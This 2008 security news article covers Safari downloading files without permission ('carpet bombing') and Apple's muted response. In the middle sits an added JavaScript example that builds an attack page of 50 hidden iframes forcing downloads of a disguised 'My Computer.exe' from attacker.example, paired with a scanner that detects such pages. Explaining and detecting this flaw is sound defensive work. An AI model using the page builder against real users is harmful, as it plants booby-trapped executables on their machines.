CyberInsecure.com

Daily cyber threats and internet security news alerts
May 15th, 2008

Apple’s Safari Downloads Websites Resources Without Asking For Permission

According to researcher Nitesh Dhanjani, the Safari browser does not ask for user permission before downloading resources from websites. When it encounters malicious iframes and other scripts, the browser obediently does what the page tells it to do, including downloading the same file as many times as the page's HTML or scripts request.

The vulnerability allows miscreants to dump hundreds of malicious files into a user’s default download location (on Windows that is the desktop, on OS X the Downloads folder). It would not be hard for a rogue site, for example, to litter a desktop with dozens of booby-trapped executables whose icons mimic the real Windows “My Computer” icon, and then wait for a confused user to click on one of them.
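To make the mechanism concrete, here is an added example (not code from the article and not Nitesh Dhanjani’s own proof of concept). It reconstructs the attack page as the article describes it, a page full of iframes whose source is a downloadable file, and pairs it with the kind of check a proxy or content scanner could run to flag such a page. The file name, the list of “save to disk” extensions and the threshold of five frames are assumptions for illustration.

```javascript
// Added example, not from the article or from Dhanjani's proof of concept.
// Reconstructs the mechanism described above: a page that embeds many iframes
// whose src is a downloadable file. A 2008-era Safari fetched each one and wrote
// it to the default download location without prompting. File name, extension
// list and threshold below are assumptions for illustration.

// Attacker side: build HTML with `count` hidden iframes all pointing at `fileUrl`.
// Each iframe is a separate navigation, so each one produces a separate download.
function buildCarpetBombPage(fileUrl, count) {
  const frames = [];
  for (let i = 0; i < count; i++) {
    frames.push(`<iframe src="${fileUrl}" width="0" height="0" style="display:none"></iframe>`);
  }
  return `<!DOCTYPE html><html><body>${frames.join('\n')}</body></html>`;
}

// Extensions a browser saves to disk rather than renders (assumed list; extend
// it for your environment).
const DOWNLOAD_EXTENSIONS = new Set(['exe', 'dll', 'scr', 'bat', 'com', 'dmg', 'pkg', 'zip']);

// Return the lower-cased extension of the last path segment, ignoring query
// string and fragment; '' when the last segment has no extension.
function extensionOf(url) {
  const path = url.split(/[?#]/)[0];
  const dot = path.lastIndexOf('.');
  const slash = path.lastIndexOf('/');
  if (dot === -1 || dot < slash) return '';
  return path.slice(dot + 1).toLowerCase();
}

// Scanner side: given page HTML, return a Map of iframe targets that look like
// forced downloads to the number of times each one is referenced.
function findForcedDownloadFrames(html) {
  const re = /<iframe\b[^>]*\bsrc\s*=\s*["']([^"']+)["'][^>]*>/gi;
  const hits = new Map();
  let m;
  while ((m = re.exec(html)) !== null) {
    const src = m[1];
    if (DOWNLOAD_EXTENSIONS.has(extensionOf(src))) {
      hits.set(src, (hits.get(src) || 0) + 1);
    }
  }
  return hits;
}

// A single framed download can be legitimate; a burst of them is the signature
// the article describes. The threshold is an assumption, tune it to taste.
function isCarpetBomb(html, threshold = 5) {
  let total = 0;
  for (const n of findForcedDownloadFrames(html).values()) total += n;
  return total >= threshold;
}

// Usage with a constructed sample: 50 frames pointing at one executable.
const samplePage = buildCarpetBombPage('http://attacker.example/My%20Computer.exe', 50);
console.log(isCarpetBomb(samplePage)); // prints true
```

The scanner is deliberately a static heuristic over markup. It does not catch frames injected by script at run time, which the article also mentions, so it belongs in front of a browser that already prompts, not instead of one.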

When informed of this vulnerability, Apple agreed that it might be good if Safari actually checked with the user before downloading potentially malicious files, but signalled that such an addition was not much of a priority.

According to Apple’s security team, Apple is not treating this as a security issue but as a further measure to raise the bar against unwanted downloads, and it wants to set users’ expectations that a fix could take quite a while, if it is ever incorporated. Meanwhile, Apple uses its security update mechanism to push Safari to Windows users who have never installed the browser, a practice that offends many who believe security update notices should be reserved for buggy software that presents a clear and present danger, that is, for buggy software that is already installed.
